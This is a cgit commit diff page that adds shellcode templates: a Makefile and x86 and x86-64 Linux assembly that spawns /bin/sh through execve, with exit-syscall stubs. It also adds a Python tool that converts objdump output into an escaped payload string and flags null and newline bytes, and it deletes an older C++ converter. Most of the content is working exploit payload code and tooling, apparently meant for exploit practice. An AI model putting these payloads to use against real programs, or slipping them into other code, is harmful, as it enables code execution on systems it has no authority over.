summaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
Diffstat
-rw-r--r--.gitignore8
-rw-r--r--templates/shellcode/Makefile17
-rw-r--r--templates/shellcode/exit32.asm8
-rw-r--r--templates/shellcode/exit64.asm8
-rw-r--r--templates/shellcode/shell32.asm14
-rw-r--r--templates/shellcode/shell64.asm15
-rwxr-xr-xtemplates/shellcode/shelltool.py30
-rw-r--r--tools/.gitignore1
-rw-r--r--tools/genhex.cpp33
9 files changed, 100 insertions, 34 deletions
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..e76473b
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,8 @@
+__pycache__/
+a.out
+*.o
+*.elf
+*.exe
+*.dll
+*.a
+*.so
diff --git a/templates/shellcode/Makefile b/templates/shellcode/Makefile
new file mode 100644
index 0000000..2e67adc
--- /dev/null
+++ b/templates/shellcode/Makefile
@@ -0,0 +1,17 @@
+.PHONY: all
+
+all: shell32.elf shell64.elf
+ @objdump -d shell32.elf | ./shelltool.py
+ @objdump -d shell64.elf | ./shelltool.py
+
+shell32.o: shell32.asm
+ nasm -f elf shell32.asm -o shell32.o
+
+shell32.elf: shell32.o
+ ld -melf_i386 shell32.o -o shell32.elf
+
+shell64.o: shell64.asm
+ nasm -f elf64 shell64.asm -o shell64.o
+
+shell64.elf: shell64.o
+ ld shell64.o -o shell64.elf
diff --git a/templates/shellcode/exit32.asm b/templates/shellcode/exit32.asm
new file mode 100644
index 0000000..559c89c
--- /dev/null
+++ b/templates/shellcode/exit32.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor ebx, ebx
+ xor eax, eax
+ mov al, 0x1
+ int 0x80
diff --git a/templates/shellcode/exit64.asm b/templates/shellcode/exit64.asm
new file mode 100644
index 0000000..fb899a2
--- /dev/null
+++ b/templates/shellcode/exit64.asm
@@ -0,0 +1,8 @@
+[SECTION .text]
+global _start
+
+_start:
+ xor rdi, rdi
+ mov al, 0x3c
+ cdq
+ syscall
diff --git a/templates/shellcode/shell32.asm b/templates/shellcode/shell32.asm
new file mode 100644
index 0000000..d12910f
--- /dev/null
+++ b/templates/shellcode/shell32.asm
@@ -0,0 +1,14 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/46809
+
+_start:
+ xor ecx, ecx
+ push 0xb
+ pop eax
+ push ecx
+ push 0x68732f2f
+ push 0x6e69622f
+ mov ebx, esp
+ int 0x80
diff --git a/templates/shellcode/shell64.asm b/templates/shellcode/shell64.asm
new file mode 100644
index 0000000..a6d4626
--- /dev/null
+++ b/templates/shellcode/shell64.asm
@@ -0,0 +1,15 @@
+[SECTION .text]
+global _start
+
+; https://www.exploit-db.com/shellcodes/47008
+
+_start:
+ xor rsi, rsi
+ push rsi
+ mov rdi, 0x68732f2f6e69622f
+ push rdi
+ push rsp
+ pop rdi
+ mov al, 0x3b
+ cdq
+ syscall
diff --git a/templates/shellcode/shelltool.py b/templates/shellcode/shelltool.py
new file mode 100755
index 0000000..b95a8cd
--- /dev/null
+++ b/templates/shellcode/shelltool.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+
+# This script will convert shellcode disassembly into an escaped string literal
+# and warn about problematic bytes in the payload.
+# objdump -d elf | ./shelltool.py
+
+import sys
+
+name = None
+bytecode = []
+badchars = [ 0x00, 0x0a ]
+
+for line in sys.stdin:
+ for tok in line.split():
+ if name is None:
+ name = tok
+ if len(tok) == 2:
+ try:
+ bytecode.append(int(tok, base=16))
+ except:
+ pass
+
+result = ''.join([ "\\x%02x"%(x) for x in bytecode ])
+result = f'{name}"{result}"'
+
+for x in badchars:
+ if x in bytecode:
+ result += f' **0x{"%02x"%(x)} detected**'
+
+print(result)
diff --git a/tools/.gitignore b/tools/.gitignore
deleted file mode 100644
index c18dd8d..0000000
--- a/tools/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-__pycache__/
diff --git a/tools/genhex.cpp b/tools/genhex.cpp
deleted file mode 100644
index a37f91e..0000000
--- a/tools/genhex.cpp
+++ /dev/null
@@ -1,33 +0,0 @@
-#include <iostream>
-#include <string>
-
-/*
- * Read in all of stdin (should be piped from objdump), look for bytecode hex,
- * and print this code, escaped in a C-string literal, to stdout.
- *
- * EG output: "\x01\x02\x03\x04"
- */
-
-int main()
-{
- std::string tmp;
- unsigned int hex;
-
- std::cout << "\"";
-
- while (true)
- {
- std::cin >> tmp;
-
- if (std::cin.eof())
- break;
-
- if (tmp.size() == 2 &&
- tmp.find(":") == std::string::npos &&
- sscanf(tmp.c_str(), "%x", &hex) > 0)
- std::cout << "\\x" << tmp;
- }
-
- std::cout << "\"\n";
- return 0;
-}
cgit-1.2.3-r5 | srcnode v0.4.0